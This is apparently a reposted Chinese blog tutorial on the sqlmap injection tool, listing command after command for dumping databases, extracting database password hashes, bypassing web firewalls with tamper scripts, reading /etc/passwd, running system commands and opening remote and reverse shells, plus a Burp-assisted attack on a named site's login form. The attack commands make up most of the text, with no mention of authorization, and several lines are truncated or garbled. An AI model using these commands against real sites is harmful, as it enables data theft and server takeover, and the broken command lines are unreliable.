Injector

網上的注入工具不少,大多也有比較詳細的解釋,可是大部分windows下的注入軟件都是對本身軟件的一種推薦,並且不少也不是很是的安全,對於有些破解版原本說,極可能自身會被帶有木馬,因此,Linux下的注入工具也是很是強大的,不過度的說,能夠徹底取代Windows下面的全部注入工具。我所介紹的是一款名爲SQLMAP的注入工具,有感興趣的能夠去他的官網看看哦!javascript

首先,SQLMAP是一個開放源碼的滲透測試工具,它能夠自動探測和利用SQL注入漏洞來接管數據庫服務器。它配備了一個強大的探測引擎,爲最終滲透測試人員提供不少猥瑣的功能,能夠拖庫,能夠訪問底層的文件系統,還能夠經過帶外鏈接執行操做系統上的命令php

其次,SQLMAP支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等數據庫的各類安全漏洞檢測。java

SQLMAP支持五種不一樣的注入模式:sql

l  基於布爾的盲注,便可以根據返回頁面判斷條件真假的注入;shell

l  基於時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增長)來判斷;數據庫

l  基於報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中;windows

l  聯合查詢注入,可使用union的狀況下的注入;瀏覽器

l  堆查詢注入,能夠同時執行多條語句的執行時的注入安全

一些簡單的SQLMAP使用:服務器

1. 基礎用法:

一下./sqlmap.py 在kali和backtrack中使用sqlmap的時候,直接用:sqlmap

./sqlmap.py -u 「注入地址」 -v 1 –dbs   // 列舉數據庫

./sqlmap.py -u 「注入地址」 -v 1 –current-db   // 當前數據庫

./sqlmap.py -u 「注入地址」 -v 1 –users    // 列數據庫用戶

./sqlmap.py -u 「注入地址」 -v 1 –current-user  // 當前用戶

./sqlmap.py -u 「注入地址」 -v 1 –tables -D 「數據庫」   // 列舉數據庫的表名

./sqlmap.py -u 「注入地址」 -v 1 –columns -T 「表名」 -D 「數據庫」   // 獲取表的列名

./sqlmap.py -u 「注入地址」 -v 1 –dump -C 「字段,字段」 -T 「表名」 -D 「數據庫」   // 獲取表中的數據,包含列

已經開始拖庫了,SQLMAP是很是人性化的,它會將獲取的數據存儲sqlmap/output/中、、、
2. sqlmap post注入
咱們在使用Sqlmap進行post型注入時, 常常會出現請求遺漏致使注入失敗的狀況。 這裏分享一個小技巧,即結合burpsuite來使用sqlmap, 用這種方法進行post注入測試會更準確,操做起來也很是容易。
   1. 瀏覽器打開目標地址http:// www.2cto.com /Login.asp
   2. 配置burp代理(127.0.0.1:8080)以攔截請求
   3. 點擊login表單的submit按鈕
   4. 這時候Burp會攔截到了咱們的登陸POST請求
   5. 把這個post請求複製爲txt, 我這命名爲search-test.txt 而後把它放至sqlmap目錄下
   6. 運行sqlmap並使用以下命令: ./sqlmap.py -r search-test.txt -p tfUPass
這裏參數-r 是讓sqlmap加載咱們的post請求rsearch-test.txt, 而-p 你們應該比較熟悉,指定注入用的參數。
3.sqlmap  cookies注入
sqlmap.py -u 「http://127.0.0.1/base.php」 –cookies 「id=1″  –dbs –level 2
2. 默認狀況下SQLMAP只支持GET/POST參數的注入測試,可是當使用–level 參數且數值>=2的時候也會檢查cookie時面的參數,當>=3的時候將檢查User-agent和Referer,那麼這就很簡單了,我 們直接在原有的基礎上面加上 –level 2 便可
利用sqlmap cookies注入突破用戶登陸繼續注入 先把用戶登錄的cookie拿到吧, 在收藏夾添加一個連接cookies屬性: 名字本身取 javascript:alert(document.cookie),,須要獲取當前cookie的時候, 直接點一下這個連接,而後複製一下彈出對話框 裏的cookie值就搞定了
sqlmap.py -u http://x.x.x.x/Down.aspx?tid=2 -p tid –dbms mssql –cookie=」info=username=test」
-p是指指定參數注入
4. sqlmap遇到url重寫的注入
哪裏存在注入就加上 * 號 1 ./sqlmap.py -u 「http://www.cunlide.com/id1/1*/id2/2「
5.sqlmap 編碼繞waf注入
./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms 「MySQL」 –technique U -p id –batch –tamper 「space2morehash.py」
在sqlmap 的 tamper目錄下有不少space2morehash.py 編碼腳本自行加載
 
 
其餘基礎:
sqlmap -u 「http://url/news?id=1」 –level=3 –smart –dbms 「Mysql」 –current-user #獲取當前用戶名稱
sqlmap -u 「http://www.xxoo.com/news?id=1」 –level=3 –smart –dbms 「Mysql」 –current-db  #獲取當前數據庫名稱
sqlmap -u 「http://www.xxoo.com/news?id=1」 –level=3 –smart –dbms 「Mysql」–tables  -D 「db_name」 #列表名
sqlmap -u 「http://url/news?id=1」 –level=3 –smart  –dbms 「Mysql」 –columns -T 「tablename」 users-D 「db_name」 -v 0 #列字段
sqlmap -u 「http://url/news?id=1」 –level=3 –smart –dbms 「Mysql」  –dump  -C 「column_name」  -T 「table_name」 -D 「db_name」 -v 0   #獲取字段內容
******************信息獲取******************

sqlmap -u 「 –smart –dbms 「Mysql」 –users  #列數據庫用戶  

sqlmap -u 「 –smart –dbms 「Mysql」 –dbs#列數據庫

sqlmap -u 「 –smart –dbms 「Mysql」–passwords #數據庫用戶密碼

sqlmap -u 「 –smart –dbms 「Mysql」–passwords-U root  -v 0 #列出指定用戶數據庫密碼

sqlmap -u 「 –smart –dbms 「Mysql」 –dump-all -v 0 #列出全部數據庫全部表

sqlmap -u 「 –smart –dbms 「Mysql」–privileges #查看權限

sqlmap -u 「 –smart –dbms 「Mysql」–privileges -U root #查看指定用戶權限

sqlmap -u 「 –smart –dbms 「Mysql」 –is-dba -v 1 #是不是數據庫管理員

sqlmap -u 「 –smart –dbms 「Mysql」 –roles #枚舉數據庫用戶角色

sqlmap -u 「 –smart –dbms 「Mysql」–udf-inject #導入用戶自定義函數(獲取系統權限!)

sqlmap -u 「 –smart –dbms 「Mysql」–dump-all –exclude-sysdbs -v 0 #列出當前庫全部表

sqlmap -u 「 –smart –dbms 「Mysql」 –union-check #是否支持union 注入

sqlmap -u 「 –smart –dbms 「Mysql」–union-cols #union 查詢表記錄

sqlmap -u 「 –smart –dbms 「Mysql」 –union-test #union 語句測試

sqlmap -u 「 –smart –dbms 「Mysql」 –union-use –banner #採用union 注入

sqlmap -u 「 –smart –dbms 「Mysql」–union-test –union-tech orderby #union 配合 order by

sqlmap -u 「 –smart –dbms 「Mysql」–method 「POST」 — data 「id=1&cat=2″ #post注入

sqlmap -u 「 –smart –dbms 「Mysql」–cookie 「COOKIE_VALUE」 #cookie注入

sqlmap -u 「 –smart –dbms 「Mysql」-b #獲取banner信息 

sqlmap -u 「http://url/news?id=1」 –level=3 –smart-v 1 -f #指紋判別數據庫類型

sqlmap -u 「http://url/news?id=1」 –level=3 –smart–proxy」http://127.0.0.1:8118」 #代理注入
sqlmap -u 「http://url/news?id=1″–string」STRING_ON_TRUE_PAGE「  #指定關鍵詞

sqlmap -u 「 –smart –dbms 「Mysql」–sql-shell #執行指定sql命令

sqlmap -u 「 –smart –dbms 「Mysql」–file /etc/passwd

sqlmap -u 「 –smart –dbms 「Mysql」–os-cmd=whoami #執行系統命令

sqlmap -u 「 –smart –dbms 「Mysql」–os-shell #系統交互shell

sqlmap -u 「 –smart –dbms 「Mysql」–os-pwn #反彈shell

sqlmap -u 「 –smart –dbms 「Mysql」–reg-read #讀取win系統註冊表

sqlmap -u 「 –smart –dbms 「Mysql」 –dbs-o 「sqlmap.log」 #保存進度

sqlmap -u 「 –smart –dbms 「Mysql」 –dbs  -o 「sqlmap.log」 –resume  #恢復已保存進度 

相關文章
相關標籤/搜索